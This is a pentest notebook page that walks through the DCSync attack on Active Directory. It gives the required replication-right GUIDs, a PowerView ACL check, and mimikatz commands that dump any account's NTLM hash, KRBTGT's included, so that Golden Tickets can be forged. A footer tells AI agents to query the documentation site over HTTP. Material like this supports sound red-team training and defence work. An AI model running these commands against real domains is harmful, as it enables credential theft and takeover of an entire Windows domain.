# DCSync

This attack simulates the behavior of a domain controller and asks other domain controllers to replicate information using the Directory Replication Service Remote Protocol ([MS-DRSR](https://msdn.microsoft.com/en-us/library/cc228086.aspx)). Basically, it lets you pretend to be a domain controller and ask for user password data.

This can be used by attackers to get any account’s NTLM hash including the KRBTGT account, which enables attackers to create [Golden Tickets](https://xedex.gitbook.io/internalpentest/active-directory/post-compromise-attacks/golden-tickets) .

The only pre-requisite to worry about is that you have an account with rights to perform domain replication. This is controlled by the Replicating Changes permissions set on the domain.

* The “[**DS-Replication-Get-Changes**](https://msdn.microsoft.com/en-us/library/ms684354\(v=vs.85\).aspx)” extended right
  * **CN:** DS-Replication-Get-Changes
  * **GUID:** 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
* The “[**Replicating Directory Changes All**](https://msdn.microsoft.com/en-us/library/ms684355\(v=vs.85\).aspx)” extended right
  * **CN:** DS-Replication-Get-Changes-All
  * **GUID:** 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
* The “[**Replicating Directory Changes In Filtered Set**](https://msdn.microsoft.com/en-us/library/hh338663\(v=vs.85\).aspx)” extended right (this one isn’t always needed but we can add it just in case :)
  * **CN:** DS-Replication-Get-Changes-In-Filtered-Set
  * **GUID:** 89e95b76-444d-4c62-991a-0facbeda640c

Now using powerview you can check the privileges by running :

```
Get-ObjectAcl -DistinguishedName "dc=fcorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')}
```

If you do have the necessary rights, the rest is quite simple. Simply execute the following command in mimikatz:

```
Lsadump::dcsync /domain:[YOUR DOMAIN ALTOUGH NOT NECESSARY] /user:[ANY USER WHOS PASSWORD DETAILS YOU WANT]
FOR EXAMPLE:
lsadump::dcsync /domain:fcorp.local /user:krbtgt
```

You can also do that via powerview :

```
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
```

Congratz  ;) 

More details and explanation :

{% embed url="<http://www.harmj0y.net/blog/redteaming/abusing-active-directory-permissions-with-powerview/>" %}

{% embed url="<https://blog.stealthbits.com/extracting-user-password-data-with-mimikatz-dcsync/>" %}

{% embed url="<https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://xedex.gitbook.io/internalpentest/internal-pentest/active-directory/post-compromise-attacks/dcsync.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.